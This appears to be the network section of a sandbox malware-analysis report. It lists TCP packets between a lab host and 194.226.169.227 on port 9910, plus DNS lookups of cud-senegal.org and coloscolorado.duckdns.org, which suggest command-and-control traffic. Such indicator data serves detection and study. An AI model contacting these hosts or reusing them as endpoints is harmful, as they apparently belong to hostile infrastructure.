Jan 15, 2025 11:38:35.376936913 CET	9910	49737	194.226.169.227	192.168.2.4
Jan 15, 2025 11:38:35.376951933 CET	49737	9910	192.168.2.4	194.226.169.227
Jan 15, 2025 11:38:35.376952887 CET	9910	49737	194.226.169.227	192.168.2.4
Jan 15, 2025 11:38:35.376971960 CET	9910	49737	194.226.169.227	192.168.2.4
Jan 15, 2025 11:38:35.377000093 CET	49737	9910	192.168.2.4	194.226.169.227
Jan 15, 2025 11:38:35.377019882 CET	49737	9910	192.168.2.4	194.226.169.227
Jan 15, 2025 11:38:35.377490997 CET	9910	49737	194.226.169.227	192.168.2.4
Jan 15, 2025 11:38:35.377507925 CET	9910	49737	194.226.169.227	192.168.2.4
Jan 15, 2025 11:38:35.377523899 CET	9910	49737	194.226.169.227	192.168.2.4
Jan 15, 2025 11:38:35.377540112 CET	9910	49737	194.226.169.227	192.168.2.4
Jan 15, 2025 11:38:35.377559900 CET	9910	49737	194.226.169.227	192.168.2.4
Jan 15, 2025 11:38:35.377563953 CET	49737	9910	192.168.2.4	194.226.169.227
Jan 15, 2025 11:38:35.377576113 CET	9910	49737	194.226.169.227	192.168.2.4
Jan 15, 2025 11:38:35.377592087 CET	9910	49737	194.226.169.227	192.168.2.4
Jan 15, 2025 11:38:35.377609968 CET	49737	9910	192.168.2.4	194.226.169.227
Jan 15, 2025 11:38:35.377610922 CET	49737	9910	192.168.2.4	194.226.169.227
Jan 15, 2025 11:38:35.420895100 CET	49737	9910	192.168.2.4	194.226.169.227
Jan 15, 2025 11:38:35.451013088 CET	9910	49737	194.226.169.227	192.168.2.4
Jan 15, 2025 11:38:35.451056957 CET	9910	49737	194.226.169.227	192.168.2.4
Jan 15, 2025 11:38:35.451096058 CET	9910	49737	194.226.169.227	192.168.2.4
Jan 15, 2025 11:38:35.451133966 CET	9910	49737	194.226.169.227	192.168.2.4
Jan 15, 2025 11:38:35.451169014 CET	9910	49737	194.226.169.227	192.168.2.4
Jan 15, 2025 11:38:35.451204062 CET	9910	49737	194.226.169.227	192.168.2.4
Jan 15, 2025 11:38:35.451240063 CET	9910	49737	194.226.169.227	192.168.2.4
Jan 15, 2025 11:38:35.451256990 CET	49737	9910	192.168.2.4	194.226.169.227
Jan 15, 2025 11:38:35.451257944 CET	49737	9910	192.168.2.4	194.226.169.227
Jan 15, 2025 11:38:35.451257944 CET	49737	9910	192.168.2.4	194.226.169.227
Jan 15, 2025 11:38:35.451277018 CET	9910	49737	194.226.169.227	192.168.2.4
Jan 15, 2025 11:38:35.451805115 CET	49737	9910	192.168.2.4	194.226.169.227
Jan 15, 2025 11:38:35.457005978 CET	9910	49737	194.226.169.227	192.168.2.4
Jan 15, 2025 11:38:35.457050085 CET	9910	49737	194.226.169.227	192.168.2.4
Jan 15, 2025 11:38:35.457134962 CET	9910	49737	194.226.169.227	192.168.2.4
Jan 15, 2025 11:38:35.457204103 CET	9910	49737	194.226.169.227	192.168.2.4
Jan 15, 2025 11:38:35.457250118 CET	49737	9910	192.168.2.4	194.226.169.227
Jan 15, 2025 11:38:35.457250118 CET	49737	9910	192.168.2.4	194.226.169.227
Jan 15, 2025 11:38:35.457269907 CET	9910	49737	194.226.169.227	192.168.2.4
Jan 15, 2025 11:38:35.457334995 CET	9910	49737	194.226.169.227	192.168.2.4
Jan 15, 2025 11:38:35.457369089 CET	9910	49737	194.226.169.227	192.168.2.4
Jan 15, 2025 11:38:35.457405090 CET	9910	49737	194.226.169.227	192.168.2.4
Jan 15, 2025 11:38:35.457439899 CET	9910	49737	194.226.169.227	192.168.2.4
Jan 15, 2025 11:38:35.457475901 CET	9910	49737	194.226.169.227	192.168.2.4
Jan 15, 2025 11:38:35.457510948 CET	9910	49737	194.226.169.227	192.168.2.4
Jan 15, 2025 11:38:35.457545042 CET	9910	49737	194.226.169.227	192.168.2.4
Jan 15, 2025 11:38:35.457568884 CET	49737	9910	192.168.2.4	194.226.169.227
Jan 15, 2025 11:38:35.457568884 CET	49737	9910	192.168.2.4	194.226.169.227
Jan 15, 2025 11:38:35.457568884 CET	49737	9910	192.168.2.4	194.226.169.227
Jan 15, 2025 11:38:35.457578897 CET	9910	49737	194.226.169.227	192.168.2.4
Jan 15, 2025 11:38:35.457614899 CET	9910	49737	194.226.169.227	192.168.2.4
Jan 15, 2025 11:38:35.457638979 CET	49737	9910	192.168.2.4	194.226.169.227
Jan 15, 2025 11:38:35.457648993 CET	9910	49737	194.226.169.227	192.168.2.4
Jan 15, 2025 11:38:35.457683086 CET	9910	49737	194.226.169.227	192.168.2.4
Jan 15, 2025 11:38:35.457706928 CET	49737	9910	192.168.2.4	194.226.169.227
Jan 15, 2025 11:38:35.457721949 CET	9910	49737	194.226.169.227	192.168.2.4
Jan 15, 2025 11:38:35.457757950 CET	9910	49737	194.226.169.227	192.168.2.4
Jan 15, 2025 11:38:35.457777977 CET	49737	9910	192.168.2.4	194.226.169.227
Jan 15, 2025 11:38:35.457791090 CET	9910	49737	194.226.169.227	192.168.2.4
Jan 15, 2025 11:38:35.457799911 CET	49737	9910	192.168.2.4	194.226.169.227
Jan 15, 2025 11:38:35.457827091 CET	9910	49737	194.226.169.227	192.168.2.4
Jan 15, 2025 11:38:35.457859039 CET	9910	49737	194.226.169.227	192.168.2.4
Jan 15, 2025 11:38:35.457892895 CET	9910	49737	194.226.169.227	192.168.2.4
Jan 15, 2025 11:38:35.457918882 CET	49737	9910	192.168.2.4	194.226.169.227
Jan 15, 2025 11:38:35.457927942 CET	9910	49737	194.226.169.227	192.168.2.4
Jan 15, 2025 11:38:35.457937956 CET	49737	9910	192.168.2.4	194.226.169.227
Jan 15, 2025 11:38:35.457966089 CET	9910	49737	194.226.169.227	192.168.2.4
Jan 15, 2025 11:38:35.458643913 CET	49737	9910	192.168.2.4	194.226.169.227
Jan 15, 2025 11:38:35.464052916 CET	9910	49737	194.226.169.227	192.168.2.4
Jan 15, 2025 11:38:35.464097977 CET	9910	49737	194.226.169.227	192.168.2.4
Jan 15, 2025 11:38:35.464178085 CET	9910	49737	194.226.169.227	192.168.2.4
Jan 15, 2025 11:38:35.464215994 CET	9910	49737	194.226.169.227	192.168.2.4
Jan 15, 2025 11:38:35.464287043 CET	9910	49737	194.226.169.227	192.168.2.4
Jan 15, 2025 11:38:35.464284897 CET	49737	9910	192.168.2.4	194.226.169.227
Jan 15, 2025 11:38:35.464284897 CET	49737	9910	192.168.2.4	194.226.169.227
Jan 15, 2025 11:38:35.464354038 CET	9910	49737	194.226.169.227	192.168.2.4
Jan 15, 2025 11:38:35.464421034 CET	9910	49737	194.226.169.227	192.168.2.4
Jan 15, 2025 11:38:35.464447975 CET	49737	9910	192.168.2.4	194.226.169.227
Jan 15, 2025 11:38:35.464488029 CET	9910	49737	194.226.169.227	192.168.2.4
Jan 15, 2025 11:38:35.464524031 CET	9910	49737	194.226.169.227	192.168.2.4
Jan 15, 2025 11:38:35.464559078 CET	9910	49737	194.226.169.227	192.168.2.4
Jan 15, 2025 11:38:35.464631081 CET	9910	49737	194.226.169.227	192.168.2.4
Jan 15, 2025 11:38:35.464696884 CET	9910	49737	194.226.169.227	192.168.2.4
Jan 15, 2025 11:38:35.464732885 CET	9910	49737	194.226.169.227	192.168.2.4
Jan 15, 2025 11:38:35.464730024 CET	49737	9910	192.168.2.4	194.226.169.227
Jan 15, 2025 11:38:35.464730024 CET	49737	9910	192.168.2.4	194.226.169.227
Jan 15, 2025 11:38:35.464768887 CET	9910	49737	194.226.169.227	192.168.2.4
Jan 15, 2025 11:38:35.464797020 CET	49737	9910	192.168.2.4	194.226.169.227
Jan 15, 2025 11:38:35.464816093 CET	49737	9910	192.168.2.4	194.226.169.227
Jan 15, 2025 11:38:35.464833021 CET	9910	49737	194.226.169.227	192.168.2.4
Jan 15, 2025 11:38:35.464899063 CET	9910	49737	194.226.169.227	192.168.2.4
Jan 15, 2025 11:38:35.464936018 CET	9910	49737	194.226.169.227	192.168.2.4
Jan 15, 2025 11:38:35.464971066 CET	9910	49737	194.226.169.227	192.168.2.4
Jan 15, 2025 11:38:35.464993000 CET	49737	9910	192.168.2.4	194.226.169.227
Jan 15, 2025 11:38:35.465006113 CET	9910	49737	194.226.169.227	192.168.2.4
Jan 15, 2025 11:38:35.465015888 CET	49737	9910	192.168.2.4	194.226.169.227
Jan 15, 2025 11:38:35.465130091 CET	9910	49737	194.226.169.227	192.168.2.4
Jan 15, 2025 11:38:35.465163946 CET	9910	49737	194.226.169.227	192.168.2.4
Jan 15, 2025 11:38:35.465199947 CET	9910	49737	194.226.169.227	192.168.2.4
Jan 15, 2025 11:38:35.465215921 CET	49737	9910	192.168.2.4	194.226.169.227
Jan 15, 2025 11:38:35.465234995 CET	9910	49737	194.226.169.227	192.168.2.4
Jan 15, 2025 11:38:35.465257883 CET	49737	9910	192.168.2.4	194.226.169.227
Jan 15, 2025 11:38:35.465270996 CET	9910	49737	194.226.169.227	192.168.2.4
Jan 15, 2025 11:38:35.465305090 CET	9910	49737	194.226.169.227	192.168.2.4
Jan 15, 2025 11:38:35.465338945 CET	9910	49737	194.226.169.227	192.168.2.4
Jan 15, 2025 11:38:35.465356112 CET	49737	9910	192.168.2.4	194.226.169.227
Jan 15, 2025 11:38:35.465373993 CET	9910	49737	194.226.169.227	192.168.2.4
Jan 15, 2025 11:38:35.465380907 CET	49737	9910	192.168.2.4	194.226.169.227
Jan 15, 2025 11:38:35.465409994 CET	9910	49737	194.226.169.227	192.168.2.4
Jan 15, 2025 11:38:35.465442896 CET	9910	49737	194.226.169.227	192.168.2.4
Jan 15, 2025 11:38:35.465477943 CET	9910	49737	194.226.169.227	192.168.2.4
Jan 15, 2025 11:38:35.465507030 CET	49737	9910	192.168.2.4	194.226.169.227
Jan 15, 2025 11:38:35.465517998 CET	9910	49737	194.226.169.227	192.168.2.4
Jan 15, 2025 11:38:35.465528011 CET	49737	9910	192.168.2.4	194.226.169.227
Jan 15, 2025 11:38:35.465555906 CET	9910	49737	194.226.169.227	192.168.2.4
Jan 15, 2025 11:38:35.465589046 CET	9910	49737	194.226.169.227	192.168.2.4
Jan 15, 2025 11:38:35.465627909 CET	9910	49737	194.226.169.227	192.168.2.4
Jan 15, 2025 11:38:35.465641975 CET	49737	9910	192.168.2.4	194.226.169.227
Jan 15, 2025 11:38:35.465660095 CET	9910	49737	194.226.169.227	192.168.2.4
Jan 15, 2025 11:38:35.465677023 CET	49737	9910	192.168.2.4	194.226.169.227
Jan 15, 2025 11:38:35.465694904 CET	9910	49737	194.226.169.227	192.168.2.4
Jan 15, 2025 11:38:35.465728998 CET	9910	49737	194.226.169.227	192.168.2.4
Jan 15, 2025 11:38:35.465763092 CET	9910	49737	194.226.169.227	192.168.2.4
Jan 15, 2025 11:38:35.465781927 CET	49737	9910	192.168.2.4	194.226.169.227
Jan 15, 2025 11:38:35.465797901 CET	9910	49737	194.226.169.227	192.168.2.4
Jan 15, 2025 11:38:35.465809107 CET	49737	9910	192.168.2.4	194.226.169.227
Jan 15, 2025 11:38:35.465831995 CET	9910	49737	194.226.169.227	192.168.2.4
Jan 15, 2025 11:38:35.465867043 CET	9910	49737	194.226.169.227	192.168.2.4
Jan 15, 2025 11:38:35.465899944 CET	9910	49737	194.226.169.227	192.168.2.4
Jan 15, 2025 11:38:35.465919018 CET	49737	9910	192.168.2.4	194.226.169.227
Jan 15, 2025 11:38:35.465934992 CET	9910	49737	194.226.169.227	192.168.2.4
Jan 15, 2025 11:38:35.465941906 CET	49737	9910	192.168.2.4	194.226.169.227
Jan 15, 2025 11:38:35.465969086 CET	9910	49737	194.226.169.227	192.168.2.4
Jan 15, 2025 11:38:35.466002941 CET	9910	49737	194.226.169.227	192.168.2.4
Jan 15, 2025 11:38:35.466037035 CET	9910	49737	194.226.169.227	192.168.2.4
Jan 15, 2025 11:38:35.466051102 CET	49737	9910	192.168.2.4	194.226.169.227
Jan 15, 2025 11:38:35.466069937 CET	9910	49737	194.226.169.227	192.168.2.4
Jan 15, 2025 11:38:35.466080904 CET	49737	9910	192.168.2.4	194.226.169.227
Jan 15, 2025 11:38:35.466105938 CET	9910	49737	194.226.169.227	192.168.2.4
Jan 15, 2025 11:38:35.466140985 CET	9910	49737	194.226.169.227	192.168.2.4
Jan 15, 2025 11:38:35.466171026 CET	9910	49737	194.226.169.227	192.168.2.4
Jan 15, 2025 11:38:35.466191053 CET	49737	9910	192.168.2.4	194.226.169.227
Jan 15, 2025 11:38:35.466203928 CET	9910	49737	194.226.169.227	192.168.2.4
Jan 15, 2025 11:38:35.466212988 CET	49737	9910	192.168.2.4	194.226.169.227
Jan 15, 2025 11:38:35.466242075 CET	9910	49737	194.226.169.227	192.168.2.4
Jan 15, 2025 11:38:35.466275930 CET	9910	49737	194.226.169.227	192.168.2.4
Jan 15, 2025 11:38:35.466310024 CET	9910	49737	194.226.169.227	192.168.2.4
Jan 15, 2025 11:38:35.466345072 CET	9910	49737	194.226.169.227	192.168.2.4
Jan 15, 2025 11:38:35.466347933 CET	49737	9910	192.168.2.4	194.226.169.227
Jan 15, 2025 11:38:35.466377974 CET	9910	49737	194.226.169.227	192.168.2.4
Jan 15, 2025 11:38:35.466389894 CET	49737	9910	192.168.2.4	194.226.169.227
Jan 15, 2025 11:38:35.466414928 CET	9910	49737	194.226.169.227	192.168.2.4
Jan 15, 2025 11:38:35.466432095 CET	49737	9910	192.168.2.4	194.226.169.227
Jan 15, 2025 11:38:35.471282005 CET	9910	49737	194.226.169.227	192.168.2.4
Jan 15, 2025 11:38:35.471354961 CET	49737	9910	192.168.2.4	194.226.169.227
Jan 15, 2025 11:38:35.471421003 CET	9910	49737	194.226.169.227	192.168.2.4
Jan 15, 2025 11:38:35.471487045 CET	9910	49737	194.226.169.227	192.168.2.4
Jan 15, 2025 11:38:35.471524954 CET	9910	49737	194.226.169.227	192.168.2.4
Jan 15, 2025 11:38:35.471559048 CET	9910	49737	194.226.169.227	192.168.2.4
Jan 15, 2025 11:38:35.471594095 CET	9910	49737	194.226.169.227	192.168.2.4
Jan 15, 2025 11:38:35.471630096 CET	9910	49737	194.226.169.227	192.168.2.4
Jan 15, 2025 11:38:35.471664906 CET	9910	49737	194.226.169.227	192.168.2.4
Jan 15, 2025 11:38:35.471698999 CET	9910	49737	194.226.169.227	192.168.2.4
Jan 15, 2025 11:38:35.471735001 CET	49737	9910	192.168.2.4	194.226.169.227
Jan 15, 2025 11:38:35.471735001 CET	49737	9910	192.168.2.4	194.226.169.227
Jan 15, 2025 11:38:35.471735001 CET	49737	9910	192.168.2.4	194.226.169.227
Jan 15, 2025 11:38:35.471767902 CET	9910	49737	194.226.169.227	192.168.2.4
Jan 15, 2025 11:38:35.471801996 CET	9910	49737	194.226.169.227	192.168.2.4
Jan 15, 2025 11:38:35.471807003 CET	49737	9910	192.168.2.4	194.226.169.227
Jan 15, 2025 11:38:35.471834898 CET	9910	49737	194.226.169.227	192.168.2.4
Jan 15, 2025 11:38:35.471868992 CET	9910	49737	194.226.169.227	192.168.2.4
Jan 15, 2025 11:38:35.471889973 CET	49737	9910	192.168.2.4	194.226.169.227
Jan 15, 2025 11:38:35.471903086 CET	9910	49737	194.226.169.227	192.168.2.4
Jan 15, 2025 11:38:35.471935987 CET	9910	49737	194.226.169.227	192.168.2.4
Jan 15, 2025 11:38:35.471941948 CET	49737	9910	192.168.2.4	194.226.169.227
Jan 15, 2025 11:38:35.471971035 CET	9910	49737	194.226.169.227	192.168.2.4
Jan 15, 2025 11:38:35.471985102 CET	49737	9910	192.168.2.4	194.226.169.227
Jan 15, 2025 11:38:35.472004890 CET	9910	49737	194.226.169.227	192.168.2.4
Jan 15, 2025 11:38:35.472039938 CET	9910	49737	194.226.169.227	192.168.2.4
Jan 15, 2025 11:38:35.472058058 CET	49737	9910	192.168.2.4	194.226.169.227
Jan 15, 2025 11:38:35.472073078 CET	9910	49737	194.226.169.227	192.168.2.4
Jan 15, 2025 11:38:35.472107887 CET	9910	49737	194.226.169.227	192.168.2.4
Jan 15, 2025 11:38:35.472157001 CET	49737	9910	192.168.2.4	194.226.169.227
Jan 15, 2025 11:38:35.546125889 CET	49737	9910	192.168.2.4	194.226.169.227
Jan 15, 2025 11:38:35.551558971 CET	9910	49737	194.226.169.227	192.168.2.4
Jan 15, 2025 11:38:35.552486897 CET	49737	9910	192.168.2.4	194.226.169.227
Jan 15, 2025 11:38:36.375269890 CET	49738	9910	192.168.2.4	194.226.169.227
Jan 15, 2025 11:38:36.380506039 CET	9910	49738	194.226.169.227	192.168.2.4
Jan 15, 2025 11:38:36.380601883 CET	49738	9910	192.168.2.4	194.226.169.227
Jan 15, 2025 11:38:36.391505957 CET	49738	9910	192.168.2.4	194.226.169.227
Jan 15, 2025 11:38:36.391542912 CET	49738	9910	192.168.2.4	194.226.169.227
Jan 15, 2025 11:38:36.396528959 CET	9910	49738	194.226.169.227	192.168.2.4
Jan 15, 2025 11:38:36.396565914 CET	9910	49738	194.226.169.227	192.168.2.4
Jan 15, 2025 11:38:36.396595955 CET	9910	49738	194.226.169.227	192.168.2.4
Jan 15, 2025 11:38:36.396713018 CET	9910	49738	194.226.169.227	192.168.2.4
Jan 15, 2025 11:38:36.396740913 CET	9910	49738	194.226.169.227	192.168.2.4
Jan 15, 2025 11:38:36.396769047 CET	9910	49738	194.226.169.227	192.168.2.4
Jan 15, 2025 11:38:36.396775961 CET	49738	9910	192.168.2.4	194.226.169.227
Jan 15, 2025 11:38:36.396804094 CET	49738	9910	192.168.2.4	194.226.169.227
Jan 15, 2025 11:38:36.396836042 CET	9910	49738	194.226.169.227	192.168.2.4
Jan 15, 2025 11:38:36.396863937 CET	9910	49738	194.226.169.227	192.168.2.4
Jan 15, 2025 11:38:36.396884918 CET	49738	9910	192.168.2.4	194.226.169.227
Jan 15, 2025 11:38:36.396893024 CET	9910	49738	194.226.169.227	192.168.2.4
Jan 15, 2025 11:38:36.396922112 CET	9910	49738	194.226.169.227	192.168.2.4
Jan 15, 2025 11:38:36.396945000 CET	49738	9910	192.168.2.4	194.226.169.227
Jan 15, 2025 11:38:36.397377968 CET	49738	9910	192.168.2.4	194.226.169.227
Jan 15, 2025 11:38:36.401798010 CET	9910	49738	194.226.169.227	192.168.2.4
Jan 15, 2025 11:38:36.401964903 CET	9910	49738	194.226.169.227	192.168.2.4
Jan 15, 2025 11:38:36.401993036 CET	9910	49738	194.226.169.227	192.168.2.4
Jan 15, 2025 11:38:36.402026892 CET	49738	9910	192.168.2.4	194.226.169.227
Jan 15, 2025 11:38:36.402062893 CET	9910	49738	194.226.169.227	192.168.2.4
Jan 15, 2025 11:38:36.402091980 CET	9910	49738	194.226.169.227	192.168.2.4
Jan 15, 2025 11:38:36.402121067 CET	9910	49738	194.226.169.227	192.168.2.4
Jan 15, 2025 11:38:36.402153969 CET	49738	9910	192.168.2.4	194.226.169.227
Jan 15, 2025 11:38:36.402271032 CET	49738	9910	192.168.2.4	194.226.169.227
Jan 15, 2025 11:38:36.444170952 CET	9910	49738	194.226.169.227	192.168.2.4
Jan 15, 2025 11:38:36.444324970 CET	49738	9910	192.168.2.4	194.226.169.227
Jan 15, 2025 11:38:36.491997957 CET	9910	49738	194.226.169.227	192.168.2.4
Jan 15, 2025 11:38:36.846762896 CET	9910	49738	194.226.169.227	192.168.2.4
Jan 15, 2025 11:38:37.413933039 CET	49738	9910	192.168.2.4	194.226.169.227
Jan 15, 2025 11:38:37.418940067 CET	9910	49738	194.226.169.227	192.168.2.4
Jan 15, 2025 11:38:37.419060946 CET	49738	9910	192.168.2.4	194.226.169.227
Jan 15, 2025 11:38:37.423930883 CET	9910	49738	194.226.169.227	192.168.2.4
Jan 15, 2025 11:38:37.814137936 CET	49738	9910	192.168.2.4	194.226.169.227
Jan 15, 2025 11:38:37.814961910 CET	49738	9910	192.168.2.4	194.226.169.227
Jan 15, 2025 11:38:37.819282055 CET	9910	49738	194.226.169.227	192.168.2.4
Jan 15, 2025 11:38:37.820017099 CET	9910	49738	194.226.169.227	192.168.2.4
Jan 15, 2025 11:38:37.820075989 CET	9910	49738	194.226.169.227	192.168.2.4
Jan 15, 2025 11:38:37.820106030 CET	9910	49738	194.226.169.227	192.168.2.4
Jan 15, 2025 11:38:37.820135117 CET	9910	49738	194.226.169.227	192.168.2.4
Jan 15, 2025 11:38:37.820138931 CET	49738	9910	192.168.2.4	194.226.169.227
Jan 15, 2025 11:38:37.820168018 CET	49738	9910	192.168.2.4	194.226.169.227
Jan 15, 2025 11:38:37.820180893 CET	9910	49738	194.226.169.227	192.168.2.4
Jan 15, 2025 11:38:37.820210934 CET	9910	49738	194.226.169.227	192.168.2.4
Jan 15, 2025 11:38:37.820214033 CET	49738	9910	192.168.2.4	194.226.169.227
Jan 15, 2025 11:38:37.820244074 CET	49738	9910	192.168.2.4	194.226.169.227
Jan 15, 2025 11:38:37.820266008 CET	9910	49738	194.226.169.227	192.168.2.4
Jan 15, 2025 11:38:37.820307016 CET	9910	49738	194.226.169.227	192.168.2.4
Jan 15, 2025 11:38:37.820319891 CET	49738	9910	192.168.2.4	194.226.169.227
Jan 15, 2025 11:38:37.820334911 CET	9910	49738	194.226.169.227	192.168.2.4
Jan 15, 2025 11:38:37.820368052 CET	49738	9910	192.168.2.4	194.226.169.227
Jan 15, 2025 11:38:37.820421934 CET	49738	9910	192.168.2.4	194.226.169.227
Jan 15, 2025 11:38:37.824059963 CET	9910	49738	194.226.169.227	192.168.2.4
Jan 15, 2025 11:38:37.824089050 CET	9910	49738	194.226.169.227	192.168.2.4
Jan 15, 2025 11:38:37.824137926 CET	49738	9910	192.168.2.4	194.226.169.227
Jan 15, 2025 11:38:37.824690104 CET	9910	49738	194.226.169.227	192.168.2.4
Jan 15, 2025 11:38:37.824721098 CET	9910	49738	194.226.169.227	192.168.2.4
Jan 15, 2025 11:38:37.824744940 CET	49738	9910	192.168.2.4	194.226.169.227
Jan 15, 2025 11:38:37.824759960 CET	9910	49738	194.226.169.227	192.168.2.4
Jan 15, 2025 11:38:37.824800968 CET	9910	49738	194.226.169.227	192.168.2.4
Jan 15, 2025 11:38:37.824831963 CET	49738	9910	192.168.2.4	194.226.169.227
Jan 15, 2025 11:38:37.824837923 CET	9910	49738	194.226.169.227	192.168.2.4
Jan 15, 2025 11:38:37.824892044 CET	9910	49738	194.226.169.227	192.168.2.4
Jan 15, 2025 11:38:37.824937105 CET	9910	49738	194.226.169.227	192.168.2.4
Jan 15, 2025 11:38:37.824965000 CET	9910	49738	194.226.169.227	192.168.2.4
Jan 15, 2025 11:38:37.824991941 CET	9910	49738	194.226.169.227	192.168.2.4
Jan 15, 2025 11:38:37.825068951 CET	9910	49738	194.226.169.227	192.168.2.4
Jan 15, 2025 11:38:37.825095892 CET	9910	49738	194.226.169.227	192.168.2.4
Jan 15, 2025 11:38:37.825124025 CET	9910	49738	194.226.169.227	192.168.2.4
Jan 15, 2025 11:38:37.825186968 CET	9910	49738	194.226.169.227	192.168.2.4
Jan 15, 2025 11:38:37.825215101 CET	9910	49738	194.226.169.227	192.168.2.4
Jan 15, 2025 11:38:37.825242996 CET	9910	49738	194.226.169.227	192.168.2.4
Jan 15, 2025 11:38:37.825269938 CET	9910	49738	194.226.169.227	192.168.2.4
Jan 15, 2025 11:38:37.825298071 CET	9910	49738	194.226.169.227	192.168.2.4
Jan 15, 2025 11:38:37.825325012 CET	9910	49738	194.226.169.227	192.168.2.4
Jan 15, 2025 11:38:37.825352907 CET	9910	49738	194.226.169.227	192.168.2.4
Jan 15, 2025 11:38:37.825380087 CET	9910	49738	194.226.169.227	192.168.2.4
Jan 15, 2025 11:38:37.828829050 CET	9910	49738	194.226.169.227	192.168.2.4
Jan 15, 2025 11:38:37.828856945 CET	9910	49738	194.226.169.227	192.168.2.4
Jan 15, 2025 11:38:37.828886032 CET	9910	49738	194.226.169.227	192.168.2.4
Jan 15, 2025 11:38:37.828913927 CET	9910	49738	194.226.169.227	192.168.2.4
Jan 15, 2025 11:38:37.828943014 CET	9910	49738	194.226.169.227	192.168.2.4
Jan 15, 2025 11:38:37.829497099 CET	9910	49738	194.226.169.227	192.168.2.4
Jan 15, 2025 11:38:37.829526901 CET	9910	49738	194.226.169.227	192.168.2.4
Jan 15, 2025 11:38:37.829595089 CET	9910	49738	194.226.169.227	192.168.2.4
Jan 15, 2025 11:38:37.829622030 CET	9910	49738	194.226.169.227	192.168.2.4
Jan 15, 2025 11:38:37.829687119 CET	9910	49738	194.226.169.227	192.168.2.4
Jan 15, 2025 11:38:37.829714060 CET	9910	49738	194.226.169.227	192.168.2.4
Jan 15, 2025 11:38:37.829742908 CET	9910	49738	194.226.169.227	192.168.2.4
Jan 15, 2025 11:38:37.829807043 CET	9910	49738	194.226.169.227	192.168.2.4
Jan 15, 2025 11:38:37.829834938 CET	9910	49738	194.226.169.227	192.168.2.4
Jan 15, 2025 11:38:37.829863071 CET	9910	49738	194.226.169.227	192.168.2.4
Jan 15, 2025 11:38:37.829890013 CET	9910	49738	194.226.169.227	192.168.2.4
Jan 15, 2025 11:38:37.829917908 CET	9910	49738	194.226.169.227	192.168.2.4
Jan 15, 2025 11:38:37.829986095 CET	9910	49738	194.226.169.227	192.168.2.4
Jan 15, 2025 11:38:37.830014944 CET	9910	49738	194.226.169.227	192.168.2.4
Jan 15, 2025 11:38:37.830041885 CET	9910	49738	194.226.169.227	192.168.2.4
Jan 15, 2025 11:38:37.830070019 CET	9910	49738	194.226.169.227	192.168.2.4
Jan 15, 2025 11:38:37.830097914 CET	9910	49738	194.226.169.227	192.168.2.4
Jan 15, 2025 11:38:37.830125093 CET	9910	49738	194.226.169.227	192.168.2.4
Jan 15, 2025 11:38:37.830152988 CET	9910	49738	194.226.169.227	192.168.2.4
Jan 15, 2025 11:38:37.830179930 CET	9910	49738	194.226.169.227	192.168.2.4
Jan 15, 2025 11:38:37.830208063 CET	9910	49738	194.226.169.227	192.168.2.4
Jan 15, 2025 11:38:37.830235004 CET	9910	49738	194.226.169.227	192.168.2.4
Jan 15, 2025 11:38:37.830261946 CET	9910	49738	194.226.169.227	192.168.2.4
Jan 15, 2025 11:38:37.830288887 CET	9910	49738	194.226.169.227	192.168.2.4
Jan 15, 2025 11:38:37.830316067 CET	9910	49738	194.226.169.227	192.168.2.4
Jan 15, 2025 11:38:37.830343008 CET	9910	49738	194.226.169.227	192.168.2.4
Jan 15, 2025 11:38:37.830409050 CET	9910	49738	194.226.169.227	192.168.2.4
Jan 15, 2025 11:38:37.830436945 CET	9910	49738	194.226.169.227	192.168.2.4
Jan 15, 2025 11:38:37.830463886 CET	9910	49738	194.226.169.227	192.168.2.4
Jan 15, 2025 11:38:37.830492020 CET	9910	49738	194.226.169.227	192.168.2.4
Jan 15, 2025 11:38:37.830557108 CET	9910	49738	194.226.169.227	192.168.2.4
Jan 15, 2025 11:38:37.830584049 CET	9910	49738	194.226.169.227	192.168.2.4
Jan 15, 2025 11:38:37.830610991 CET	9910	49738	194.226.169.227	192.168.2.4
Jan 15, 2025 11:38:38.343703985 CET	49738	9910	192.168.2.4	194.226.169.227
Jan 15, 2025 11:38:38.348716021 CET	9910	49738	194.226.169.227	192.168.2.4
Jan 15, 2025 11:38:38.348927021 CET	49738	9910	192.168.2.4	194.226.169.227
Jan 15, 2025 11:38:38.353858948 CET	9910	49738	194.226.169.227	192.168.2.4
Jan 15, 2025 11:38:38.669622898 CET	9910	49738	194.226.169.227	192.168.2.4
Jan 15, 2025 11:38:38.717758894 CET	49738	9910	192.168.2.4	194.226.169.227
Jan 15, 2025 11:38:38.808576107 CET	9910	49738	194.226.169.227	192.168.2.4
Jan 15, 2025 11:38:38.815336943 CET	49738	9910	192.168.2.4	194.226.169.227
Jan 15, 2025 11:38:38.820491076 CET	9910	49738	194.226.169.227	192.168.2.4
Jan 15, 2025 11:38:38.820772886 CET	49738	9910	192.168.2.4	194.226.169.227

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Jan 15, 2025 11:38:09.287466049 CET	53092	53	192.168.2.4	1.1.1.1
Jan 15, 2025 11:38:09.520229101 CET	53	53092	1.1.1.1	192.168.2.4
Jan 15, 2025 11:38:34.227838039 CET	61468	53	192.168.2.4	1.1.1.1
Jan 15, 2025 11:38:34.330296040 CET	53	61468	1.1.1.1	192.168.2.4
Jan 15, 2025 11:38:36.022758961 CET	50938	53	192.168.2.4	1.1.1.1
Jan 15, 2025 11:38:36.031413078 CET	53	50938	1.1.1.1	192.168.2.4

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Jan 15, 2025 11:38:09.287466049 CET	192.168.2.4	1.1.1.1	0x6f8b	Standard query (0)	cud-senegal.org	A (IP address)	IN (0x0001)	false
Jan 15, 2025 11:38:34.227838039 CET	192.168.2.4	1.1.1.1	0x2e49	Standard query (0)	coloscolorado.duckdns.org	A (IP address)	IN (0x0001)	false
Jan 15, 2025 11:38:36.022758961 CET	192.168.2.4	1.1.1.1	0x2b44	Standard query (0)	35.37.15.0.in-addr.arpa	PTR (Pointer record)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class	DNS over HTTPS
Jan 15, 2025 11:38:09.520229101 CET	1.1.1.1	192.168.2.4	0x6f8b	No error (0)	cud-senegal.org		51.159.14.89	A (IP address)	IN (0x0001)	false
Jan 15, 2025 11:38:34.330296040 CET	1.1.1.1	192.168.2.4	0x2e49	No error (0)	coloscolorado.duckdns.org		194.226.169.227	A (IP address)	IN (0x0001)	false
Jan 15, 2025 11:38:36.031413078 CET	1.1.1.1	192.168.2.4	0x2b44	Name error (3)	35.37.15.0.in-addr.arpa	none	none	PTR (Pointer record)	IN (0x0001)	false

HTTP Request Dependency Graph

